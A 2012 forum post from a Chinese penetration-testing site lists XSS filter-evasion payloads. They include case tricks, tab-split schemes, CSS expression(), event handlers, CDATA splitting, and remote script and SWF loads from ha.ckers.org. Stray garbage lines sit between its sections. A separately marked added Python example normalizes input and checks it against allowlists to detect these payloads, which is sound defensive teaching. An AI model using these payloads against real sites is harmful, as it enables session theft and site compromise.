China Network Penetration Testing Alliance (中国网络渗透测试联盟)

Title: Introduction to Cross Site Scripting (XSS) attack techniques

Author: admin    Posted: 2012-12-31 09:59
Title: Introduction to Cross Site Scripting (XSS) attack techniques
1. Change the letter case

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Use a different file extension in place of .js

    <script src="bad.jpg"></script>

4. Put the JavaScript inside a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }
7 u1 G) E( X+ Y1 c, b- ~
5. Insert extra characters inside the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>
1 O. J- _# N$ f. ]% z; e. b- c
6. Use a tab or a newline to evade (the rendered page shows the tab and the newline inside "javascript" as spaces)

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> newline
+ z4 u9 @& s$ [8 Y2 }+ I+ g
7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
: q! @* h5 o: T; U$ w/ d( `- [2 l2 Z
8. Use hex encoding to evade (the ";" may also be dropped)

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

        Source: <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">

        Source: <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('abc');">
4 i9 e  i. h4 l- ^! `- E& d' E- [! |+ Z: R8 T  E3 N
9. Script in an HTML tag (event-handler attributes)

    <body onload="alert('onload')">

        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload
: D6 u' o+ S' N' `* `6 z+ D# ^2 ?0 E. d$ Y" T
10. XSS code embedded in an SWF file

    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
0 I6 }3 n0 f) ?3 x1 ~" ^. A$ G
11. Use CDATA to split the XSS code so that the browser reassembles it.

    <XML ID=I><X><C>

    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>

    </C></X>

    </xml>

    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>

    <XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML>

    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
# V) x" n4 U* J' V
12. Use HTML+TIME.

    <HTML><BODY>

    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">

    <?import namespace="t" implementation="#default#time2">

    <t:set attributeName="innerHTML" to="anyword<SCRIPT DEFER>alert("XSS")</SCRIPT>">

    </BODY></HTML>

13. Set a cookie via META.

    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
2 j. C0 P/ ?2 z/ x* |8 B
14. JavaScript in src, href, url

    <IFRAME SRC=javascript:alert('13')></IFRAME>

    <img src="javascript:alert('XSS3')">

    <IMG DYNSRC="javascript:alert('XSS20')">

    <IMG LOWSRC="javascript:alert('XSS21')">

    <LINK REL="stylesheet" HREF="javascript:alert('XSS24');">

    <IFRAME SRC=javascript:alert('XSS27')></IFRAME>

    <TABLE BACKGROUND="javascript:alert('XSS29')">

    <DIV STYLE="background-image: url(javascript:alert('XSS30'))">

    <STYLE TYPE="text/css">.XSS{background-image:url("javascript:alert('XSS35')");}

    </STYLE><A CLASS=XSS></A>

    <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
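Every technique above targets a filter that pattern-matches the raw input string: it changes case, splits the scheme with tabs or newlines, entity-encodes it, or hides a CSS keyword behind backslash escapes and comments, and the browser undoes all of that before it acts. The following Python is an added example, not code from the original post or from the forum; it shows why a substring check for "javascript:" misses the payloads in sections 1, 6, 7, 9 and 14, and how decoding the way the browser does, then applying an allowlist, catches them. The tag, attribute and scheme allowlists, the function names and the sample inputs are assumptions chosen for illustration.

```python
"""Normalize-then-allowlist checks against the XSS evasions listed above.

Added example (not from the original post). Constructed sample inputs are
taken from the techniques in the post; allowlists are illustrative.
"""
import html
import re
from html.parser import HTMLParser

SAFE_SCHEMES = {"http", "https", "mailto"}              # allowlist, not a blocklist
ALLOWED_TAGS = {"a", "b", "i", "em", "strong", "p", "br", "div", "span",
                "img", "ul", "ol", "li"}                 # illustrative allowlist
URL_ATTRS = {"src", "href", "dynsrc", "lowsrc", "background", "action"}

_TAB_LF_CR = re.compile(r"[\t\n\r]")            # browsers strip these from URLs
_LEADING_CONTROLS = re.compile(r"^[\x00-\x20]+")
_SCHEME = re.compile(r"([a-zA-Z][a-zA-Z0-9+.\-]*):")
_CSS_ESCAPE = re.compile(r"\\([0-9a-fA-F]{1,6})\s?|\\(.)", re.S)
_CSS_DANGEROUS = re.compile(r"expression\s*\(|javascript\s*:")


def naive_is_dangerous_url(value: str) -> bool:
    """The kind of filter sections 1, 6 and 14 are written to slip past."""
    return "javascript:" in value


def normalize_url(value: str) -> str:
    """Apply the decodings a browser applies before it reads the scheme."""
    v = html.unescape(value)              # &#x6A;avascript: -> javascript:
    v = _TAB_LF_CR.sub("", v)             # "jav\tascr\nipt:" -> "javascript:"
    return _LEADING_CONTROLS.sub("", v)   # leading spaces / C0 controls


def url_scheme(value: str) -> str:
    m = _SCHEME.match(normalize_url(value))
    return m.group(1).lower() if m else ""    # "" means a relative URL


def is_safe_url(value: str) -> bool:
    scheme = url_scheme(value)
    return scheme == "" or scheme in SAFE_SCHEMES


def strip_css_comments(css: str) -> str:
    """Drop /* */ comments like a CSS tokenizer does: a '/*' inside a quoted
    string is string content, which the ("*//*") payload in section 7 relies on."""
    out, i, quote = [], 0, None
    while i < len(css):
        c = css[i]
        if quote:
            out.append(c)
            if c == "\\" and i + 1 < len(css):   # escaped char inside a string
                out.append(css[i + 1])
                i += 1
            elif c == quote:
                quote = None
        elif c in "\"'":
            quote = c
            out.append(c)
        elif css.startswith("/*", i):
            end = css.find("*/", i + 2)
            i = len(css) if end < 0 else end + 2
            continue
        else:
            out.append(c)
        i += 1
    return "".join(out)


def normalize_css(value: str) -> str:
    """Entities, comments and backslash escapes undone; case folded."""
    v = strip_css_comments(html.unescape(value))
    v = _CSS_ESCAPE.sub(lambda m: chr(min(int(m.group(1), 16), 0x10FFFF))
                        if m.group(1) else m.group(2), v)
    return v.lower()


def css_is_dangerous(value: str) -> bool:
    return bool(_CSS_DANGEROUS.search(normalize_css(value)))


class _Scanner(HTMLParser):
    """Collect findings; HTMLParser lower-cases names and decodes attribute entities."""
    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            self.findings.append(f"<{tag}>: tag not in allowlist")
        for name, value in attrs:
            value = value or ""
            if name.startswith("on"):                       # whole section 9 list
                self.findings.append(f"<{tag}>: event-handler attribute {name}")
            elif name in URL_ATTRS and not is_safe_url(value):
                self.findings.append(f"<{tag}>: {name} uses scheme {url_scheme(value)!r}")
            elif name == "style" and css_is_dangerous(value):
                self.findings.append(f"<{tag}>: style contains expression()/javascript:")


def scan_html(fragment: str) -> list:
    s = _Scanner()
    s.feed(fragment)
    s.close()
    return s.findings


if __name__ == "__main__":
    for sample in ["jav\tascr\nipt:alert('XSS')", "JaVaScRiPt:alert(1)"]:
        print(naive_is_dangerous_url(sample), is_safe_url(sample))   # False False
    for frag in ["<sCript>alert('d')</scRipT>",
                 "<body onload=\"alert('onload')\">",
                 "<DIV STYLE=\"width: expre\\ssi\\on(alert('XSS31'));\">",
                 "<a href=\"https://example.com/\">ok</a>"]:
        print(frag, "->", scan_html(frag))
```

The order matters: decode first, match second, and match against an allowlist rather than a list of bad strings, because every section above is a new way to spell the same bad string. For production input, an established HTML sanitizer that already follows this model is preferable to a hand-written one like this, and rejecting user-controlled style attributes outright is simpler than parsing them.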
: J3 n5 j( h% k3 R2 n8 p4 A
4 W3 e9 \& K7 T/ k




Welcome to China Network Penetration Testing Alliance (https://www.cobjon.com/) Powered by Discuz! X3.2